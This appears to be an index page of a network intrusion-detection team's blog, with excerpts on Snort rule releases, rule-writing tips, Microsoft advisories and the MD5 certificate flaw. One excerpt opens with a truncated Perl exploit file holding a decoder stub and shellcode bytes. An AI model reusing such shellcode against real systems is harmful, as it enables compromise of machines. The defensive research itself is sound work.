Preventing Shong from getting her CISSP
================== exploit.pl ================== $decoder = "\x44\x8b\xec\x45\x45\x45\x45\xeb\x0f\x58\x80\x30\x90\x40\x81" . "\x38\x4f\x4c\x4c\x41\x75\xf4\xeb\x05\xe8\xec\xff\xff\xff"; $shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x
Microsoft Tuesday Coverage for January MS09-001
Just one Microsoft advisory to start the new year, we worked like crazy spider monkeys to get it covered and we did it. Details are available here: http://www.snort.org/vrt/advisories/vrt-rules-2009-01-13.html
Using Snort Subscriber Rule Set Certified Shared Object Rules
In order to instantiate shared object rules, a rule stub file is required. These stub files are not distributed in the VRT Certified rule packs, however they can be generated using snort. Here is an example showing the pertinent configuration options in snort.conf along with the
Tips for Writing Good Rules from a n00b
It has been two months since I joined the VRT. Since then, I have learned a lot about Snort and want to share some tactics with other people who are new to Snort (as I was). More precisely, I want to talk about how to write good Snort rules with performance in mind. First of all
New byakugan functionality!
I've just added a new jutsu method to byakugan to help you find the address of a particular primitive (DWORD, WORD, or BYTE) in memory. Obviously, this isn't a terribly difficult task - you use the search function in windbg. What trackVal will do for you is allow you to s
Md5 actually harmful
You probably shouldn't take any other view of this vulnerability into consideration. Some amazing research and dedication went into proving this vulnerability is realistic and viable. You should note that detection of it is not really feasible; the bad certs look exactly like
The vuln before Christmas
* T'was the night before Christmas, and all through the net, * not a hacker was stirring, not even FX, * the servers all hummed in post-purchase daze, * to await the deluge of gift-card traffic craze, * * The VRT was drinking, three sheets to the wi
MS-SQL Quickie update
Hey folks, Since MS chose today to speak on this issue (see http://www.microsoft.com/technet/security/advisory/961040.mspx) We wanted to remind you that we released coverage for this rule on the 9th of December. The following SIDs address this issue: 15127, 15128, 15129, 15130
Rule release for today - December 23 2008
Mostly a maintenance release this one, some new rules in web-activex, web-client, backdoor and specific-threats. Check out the information here: http://www.snort.org/vrt/advisories/vrt-rules-2008-12-23.html